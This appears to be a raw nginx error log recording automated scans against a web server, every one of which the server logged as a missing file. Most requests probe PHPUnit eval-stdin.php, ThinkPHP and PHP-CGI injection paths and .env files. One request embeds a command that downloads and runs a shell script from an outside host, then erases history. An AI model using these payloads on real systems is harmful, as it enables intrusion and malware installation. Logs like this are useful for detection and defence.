2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:28 [error] 819#819: *14815 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:26:07 [error] 830#830: *18736 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:46 [error] 827#827: *18746 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:48 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:49 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:50 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:51 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:52 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:54 [error] 827#827: *18746 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:55 [error] 827#827: *18746 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:56 [error] 827#827: *18746 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:57 [error] 827#827: *18746 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:58 [error] 827#827: *18746 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:36:59 [error] 827#827: *18746 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:01 [error] 827#827: *18746 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:02 [error] 827#827: *18746 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:03 [error] 827#827: *18746 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:04 [error] 827#827: *18746 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:05 [error] 827#827: *18746 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:06 [error] 827#827: *18746 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:07 [error] 827#827: *18746 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:09 [error] 827#827: *18746 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:10 [error] 827#827: *18746 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:11 [error] 827#827: *18746 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:12 [error] 827#827: *18746 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:14 [error] 827#827: *18746 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:15 [error] 827#827: *18746 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:16 [error] 827#827: *18746 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:17 [error] 827#827: *18746 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:18 [error] 827#827: *18746 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:19 [error] 827#827: *18746 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:20 [error] 827#827: *18746 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:22 [error] 827#827: *18746 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:23 [error] 827#827: *18746 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:24 [error] 827#827: *18746 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:25 [error] 827#827: *18746 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:26 [error] 827#827: *18746 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:27 [error] 827#827: *18746 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:28 [error] 827#827: *18746 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:30 [error] 827#827: *18746 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:31 [error] 827#827: *18746 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:32 [error] 827#827: *18746 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 12:37:36 [error] 827#827: *18746 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 14:22:22 [error] 829#829: *21348 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 14:38:18 [error] 829#829: *22498 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 35.203.211.208, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 18:57:07 [error] 842#842: *25287 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 167.94.146.57, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "222.117.41.51"
2026/02/15 20:48:05 [error] 839#839: *25425 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 47.121.210.129, server: localhost-nginx-proxy-manager, request: "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.43%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+rm+-rf+%2A.sh%3B+history+-c HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 21:37:09 [error] 839#839: *25442 open() "/var/www/html/vpn/js/rdx/core/lang/rdx_en.json.gz" failed (2: No such file or directory), client: 173.255.221.145, server: localhost-nginx-proxy-manager, request: "GET /vpn/js/rdx/core/lang/rdx_en.json.gz HTTP/1.1", host: "222.117.41.51"
2026/02/15 21:37:32 [error] 840#840: *25443 open() "/var/www/html/wsman" failed (2: No such file or directory), client: 167.99.11.195, server: localhost-nginx-proxy-manager, request: "POST /wsman HTTP/1.1", host: "222.117.41.51"
2026/02/15 21:37:51 [error] 840#840: *25445 open() "/var/www/html/_layouts/15/error.aspx" failed (2: No such file or directory), client: 206.189.72.48, server: localhost-nginx-proxy-manager, request: "GET /_layouts/15/error.aspx HTTP/1.1", host: "222.117.41.51"
2026/02/15 21:38:11 [error] 840#840: *25447 open() "/var/www/html/auth.html" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /auth.html HTTP/1.1", host: "222.117.41.51"
2026/02/15 21:38:11 [error] 840#840: *25448 open() "/var/www/html/auth1.html" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /auth1.html HTTP/1.1", host: "222.117.41.51"
2026/02/15 21:38:12 [error] 840#840: *25449 open() "/var/www/html/sslvpnLogin.html" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /sslvpnLogin.html HTTP/1.1", host: "222.117.41.51"
2026/02/15 21:38:12 [error] 840#840: *25450 open() "/var/www/html/api/sonicos/auth" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /api/sonicos/auth HTTP/1.1", host: "222.117.41.51"
2026/02/15 21:38:12 [error] 840#840: *25451 open() "/var/www/html/api/sonicos/tfa" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /api/sonicos/tfa HTTP/1.1", host: "222.117.41.51"
2026/02/15 21:57:28 [error] 839#839: *26956 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:31 [error] 843#843: *26985 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:32 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:32 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:32 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:32 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:33 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:33 [error] 843#843: *26985 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:33 [error] 843#843: *26985 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:33 [error] 843#843: *26985 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:35 [error] 843#843: *26985 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:35 [error] 843#843: *26985 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:35 [error] 843#843: *26985 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:35 [error] 843#843: *26985 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
